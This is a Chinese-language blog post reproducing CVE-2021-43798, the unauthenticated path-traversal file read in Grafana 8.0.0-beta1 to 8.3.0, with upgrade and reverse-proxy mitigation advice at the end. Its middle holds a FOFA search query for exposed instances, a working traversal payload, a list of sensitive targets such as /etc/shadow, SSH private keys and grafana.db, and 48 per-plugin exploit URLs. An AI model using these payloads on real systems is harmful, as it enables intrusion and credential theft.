CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞

目录

漏洞原理

漏洞信息

受影响版本

FOFA搜集相关资产

漏洞分析&漏洞复现

解决方案


漏洞原理

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
攻击者可以通过将包含特殊目录便利字符序列(../)的特制HTTP请求发送到受影响的设备来利用此漏洞,成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的任意文件。

漏洞信息

CVE: CVE-2021-43798
CVSS: 7.5

受影响版本

Grafana 8.0.0-beta1 to 8.3.0

FOFA搜集相关资产

app="Grafana"

漏洞分析&漏洞复现

读取敏感文件复现poc

/public/plugins/alertlist/../../../../../../../../etc/passwd

读取数据库文件

读取配置文件

 还可以读取的其他文件

/conf/defaults.ini

/etc/grafana/grafana.ini

/etc/passwd

/etc/shadow

/home/grafana/.bash_history

/home/grafana/.ssh/id_rsa

/root/.bash_history

/root/.ssh/id_rsa

/usr/local/etc/grafana/grafana.ini

/var/lib/grafana/grafana.db

/proc/net/fib_trie

/proc/net/tcp

/proc/self/cmdline

该漏洞由于Grafana Plugins引发的目录穿越漏洞导致任意文件读取,上述截图仅展示了grafana-clock-panel插件的效果。官方公布的受影响Plugins为40个。

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

因为受影响的插件太多,所以建议使用BurpSuite工具爆破一波

解决方案

v8.0.0-beta1 和 v8.3.0 之间的所有安装都应尽快升级。

如果无法升级,在 Grafana 前运行反向代理来规范化请求的 PATH 将缓解该漏洞。例如,envoy 中的normalize_path设置。

得益于我们的深度防御方法,Grafana Cloud实例并未受到该漏洞的影响。

与往常一样,我们与所有许可提供 Grafana Pro 的云提供商密切协调。他们已收到禁运的早期通知,并确认他们的产品在本公告发布时是安全的。按字母顺序,这适用于 Amazon Managed Grafana 和 Azure Managed Grafana。

本文参考:GitHub - jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability

CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞相关推荐

  1. Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

  2. Grafana 任意文件读取漏洞复现

    一.漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二.漏洞影响 Grafana 8.x 三.漏洞复现 可以从登陆页面看到版本信息为 v8.2. ...

  3. 记一次小米路由器任意文件读取漏洞

    文章目录 前言 一.漏洞发现 二.漏洞挖掘 1.简单的爆破 2.文件读取 三.漏洞利用 总结 前言 任意文件读取漏洞,是web安全里高危的漏洞,它可以泄露源码.数据库配置文件等等,导致网站处于极度不安 ...

  4. CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)

    漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...

  5. 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

    漏洞描述 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件 漏洞影响 用友 畅捷通T+ 网络测绘 app="畅捷通-T ...

  6. 安全研究 | Jenkins 任意文件读取漏洞分析

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

  7. Apache Solr任意文件读取漏洞复现

    Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...

  8. CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)

    CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一.漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Fir ...

  9. 7天学习Go语言-尾声+一次险些翻车的任意文件读取漏洞小记

    接口 接口的定义 接口(interface )类型是对其他类型行为的概括和抽象,接口类型定义了一组方法,但是不包括这些方法的具体实现 接口本质是一种指针类型,可以实现多态功能.如果一个类型实现了某个接 ...

最新文章

  1. 444牛X的日常口语
  2. mysql fabric c .net_MySQL Fabric [01] 简介
  3. 举例详细说明javascript作用域、闭包原理以及性能问题(转)
  4. PHP源码之数组的内部实现
  5. asp.net发送邮件
  6. 使用代理下载Unity AssetStore上资源的方法
  7. apt-get install php5-redis,Ubuntu安装redis和php5-redis扩展
  8. java 扇形_使用js画图之圆、弧、扇形
  9. MySQL 开启二进制日志记录
  10. 无人机图像的目标检测的学习
  11. VBA连接MySQL数据库以及ODBC的配置(ODBC版本和MySQL版本如果不匹配会出现驱动和应用程序的错误)...
  12. qtcpsocket断开_Qt QTcpSocket 对连接服务器中断的不同情况进行判定
  13. 将全部视频画面水平或者垂直翻转的实例教程分享
  14. 【Python PIL】用PIL绘制中国象棋棋盘
  15. TIA Protal 精智面板中的动画外观
  16. selenium防爬无头浏览器和模拟手机浏览器
  17. 监控记录交换机端口流量及性能,MSRM3一分钟搞定
  18. 深度学习在美团配送ETA预估中的探索与实践-笔记
  19. 语音合成学习(一)综述
  20. Android 实现一键反混淆功能

热门文章

  1. MyBatis insert操作返回主键
  2. Laya游戏开发经验总结
  3. 树莓派3B--树莓派屏幕的安装
  4. java 判断星座,java基础题、关于输入月日来判断星座的、求教,该怎么解决
  5. 怎么搭建知识付费平台系统
  6. 【哈工大2022计算机系统大作业“程序人生”】
  7. 171-有趣的OpenAI的chatGPT小实验
  8. 【测量学】速成汇总——摘录高数帮
  9. Jenkins+solor
  10. 靠在校所学的前端知识,你可能连实习都找不到,附【大前端学习路线】